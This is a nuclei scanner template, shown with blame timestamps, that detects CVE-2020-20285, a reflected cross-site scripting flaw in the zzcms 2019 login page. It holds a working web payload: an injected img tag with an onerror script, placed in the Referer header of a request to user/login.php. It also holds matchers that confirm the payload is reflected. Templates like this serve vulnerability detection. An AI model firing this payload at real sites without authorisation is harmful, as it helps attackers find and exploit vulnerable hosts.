nuclei-templates/cves/2020/CVE-2020-20285.yaml

41 lines
998 B
YAML
Raw Normal View History

2022-09-30 13:33:15 +00:00
id: CVE-2020-20285
info:
2022-10-01 09:45:15 +00:00
name: zzcms - Reflected XSS
2022-09-30 13:33:15 +00:00
author: edoardottt
severity: medium
2022-09-30 13:40:34 +00:00
description: |
There is a XSS in the user login page in zzcms 2019. Users can inject js code by the referer header via user/login.php
2022-09-30 13:33:15 +00:00
reference:
- https://github.com/iohex/ZZCMS/blob/master/zzcms2019_login_xss.md
- https://nvd.nist.gov/vuln/detail/CVE-2020-20285
classification:
cve-id: CVE-2020-20285
2022-10-01 09:45:15 +00:00
metadata:
verified: true
fofa-query: "zzcms"
2022-09-30 13:33:15 +00:00
tags: cve,cve2020,zzcms,xss
requests:
- raw:
- |
2022-10-01 09:27:54 +00:00
GET /user/login.php HTTP/1.1
2022-09-30 13:33:15 +00:00
Host: {{Hostname}}
Referer: xss"/><img src="#" onerror="alert(document.domain)"/>
matchers-condition: and
matchers:
2022-10-01 09:27:54 +00:00
- type: word
part: body
words:
- 'fromurl" type="hidden" value="xss"/><img src="#" onerror="alert(document.domain)"/>'
2022-09-30 13:33:15 +00:00
- type: word
part: header
words:
- "text/html"
2022-10-01 09:27:54 +00:00
- type: status
status:
- 200